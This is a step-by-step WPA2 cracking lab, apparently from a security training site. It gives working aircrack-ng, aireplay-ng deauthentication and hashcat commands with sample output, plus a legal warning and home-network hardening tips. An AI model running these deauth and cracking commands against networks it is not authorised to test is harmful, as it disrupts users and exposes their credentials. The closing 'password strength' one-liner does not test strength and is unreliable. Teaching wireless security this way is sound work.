๐ŸŽฏ Lab Objectives

  • Understand WPA2 handshake-based authentication
  • Enable monitor mode on a wireless adapter
  • Capture a WPA2 4-way handshake using airodump-ng
  • Accelerate capture using a deauthentication attack
  • Crack the handshake offline with a wordlist
โš ๏ธ
Legal Warning: Only perform wireless attacks on networks you OWN or have explicit written authorisation to test. Attacking networks without permission is illegal everywhere and carries serious criminal penalties. Use a home test network for this lab.

Step 1 โ€” WiFi Security Overview

# WiFi security protocols (weakest โ†’ strongest):
WEP    โ†’ Broken. Cracked in minutes. Never use.
WPA    โ†’ Weak. TKIP-based. Avoid.
WPA2   โ†’ Current standard. Uses AES/CCMP. Vulnerable to offline dictionary attacks.
WPA3   โ†’ Latest. Resistant to offline attacks (SAE handshake). Use when possible.

# How WPA2 authentication works:
1. Client sends authentication request to AP
2. AP responds with a random nonce (ANonce)
3. Client generates PTK (pairwise transient key) using:
   โ†’ Password + SSID + ANonce + client nonce (SNonce) + MACs
4. Client sends SNonce + MIC (message integrity code)
5. AP verifies MIC โ†’ if correct, password is right

Attack: capture this 4-way handshake, then brute-force the password OFFLINE

Step 2 โ€” Enable Monitor Mode

# Requires a wireless adapter that supports monitor mode
# Recommended: Alfa AWUS036ACH or similar (internal card often works too)

# Check your wireless interface
iwconfig
ip link show
# Look for: wlan0, wlan1, etc.

# Kill processes that interfere with monitor mode
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Interface is now: wlan0mon (or mon0)

# Verify monitor mode
iwconfig wlan0mon
# Mode: Monitor  โ† should show this

# To disable monitor mode (when done):
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager

Step 3 โ€” Discover Networks

# Scan for all nearby networks
sudo airodump-ng wlan0mon

# Output columns:
BSSID              PWR  Beacons  #Data  #/s  CH  MB   ENC  CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF  -42     245      5    0   6   54   WPA2 CCMP   PSK  MyHomeWiFi

# Key columns:
# BSSID  โ†’ MAC address of the access point
# CH     โ†’ Channel (1-14 for 2.4GHz, 36-165 for 5GHz)
# ENC    โ†’ Encryption type (WPA2 = target)
# ESSID  โ†’ Network name (SSID)

# Focus on one target network
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel 6 --write capture wlan0mon
# --bssid: filter to this AP
# --channel: lock to its channel
# --write capture: save to capture-01.cap

Step 4 โ€” Capture the WPA2 Handshake

# Keep airodump-ng running and wait for a client to (re)connect
# A handshake is captured when a device connects to the AP

# Watch the top-right corner for:
WPA handshake: AA:BB:CC:DD:EE:FF    โ† handshake captured!

# If no one is connecting, use Step 5 to force a reconnection

# Verify captured handshake:
sudo aircrack-ng capture-01.cap
# If handshake is present, you'll see the SSID and "1 handshake"

Step 5 โ€” Deauthentication Attack (Speed Up Capture)

# Force a connected client to disconnect โ†’ they auto-reconnect โ†’ handshake captured
# Requires knowing a connected client's MAC (shown in airodump-ng under STATION)

# Send 5 deauth packets to a specific client
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -a = AP MAC (BSSID)
# -c = client MAC (STATION)
# --deauth 5 = send 5 deauth frames

# Broadcast deauth (disconnect ALL clients) โ€” more disruptive
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Watch airodump-ng window for:
# WPA handshake: AA:BB:CC:DD:EE:FF
# โ†’ Now proceed to cracking

Step 6 โ€” Crack with Aircrack-ng

# Dictionary attack against the captured handshake
sudo aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

# Specify BSSID if multiple networks were captured
sudo aircrack-ng capture-01.cap -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt

# Output when cracking:
[00:03:24] 246453/9822768 keys tested (1135.27 k/s)
Current passphrase: password123
KEY FOUND! [ supersecretpassword123 ]

# If rockyou fails, try better wordlists:
# /usr/share/seclists/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt
# /usr/share/wordlists/fasttrack.txt

# Hashcat is MUCH faster (uses GPU):
# First convert to hashcat format:
hcxpcapngtool -o handshake.hc22000 capture-01.cap
hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txt

Step 7 โ€” Defend Your WiFi

# If aircrack can crack your password, so can an attacker
# Defensive recommendations:

1. Use WPA3 if your router supports it
2. Long, random password (20+ chars) โ†’ dictionary attacks fail
   Bad:  "password123", "myhouse2024"
   Good: "xK9#mP2$vL7qN1@hR5!"

3. Use WPA2-Enterprise (802.1X) for business networks
   โ†’ Each user has unique credentials (no shared PSK)

4. Hide SSID? โ†’ useless, attackers can still see it via probe requests

5. MAC filtering? โ†’ weak, MACs can be spoofed easily

6. Regular password rotation for business networks

7. Guest network isolation โ†’ visitors can't reach internal devices

# Test your own password strength:
echo -n "YourSSIDYourPassword" | python3 -c "import sys, hashlib; print(hashlib.pbkdf2_hmac('sha1',sys.stdin.buffer.read(),b'SSID',4096,32).hex())"
โœ…
Lab Complete! If aircrack-ng can crack your own WiFi password in minutes โ€” change it immediately. A 20-character random password makes dictionary attacks practically impossible.
Related: Password Cracking โ†’ โ† All Labs
// guided terminal

Try It Live

Type the commands from the steps above. The terminal simulates the expected output for this lab.

KaliRange ~ Terminal type help for commands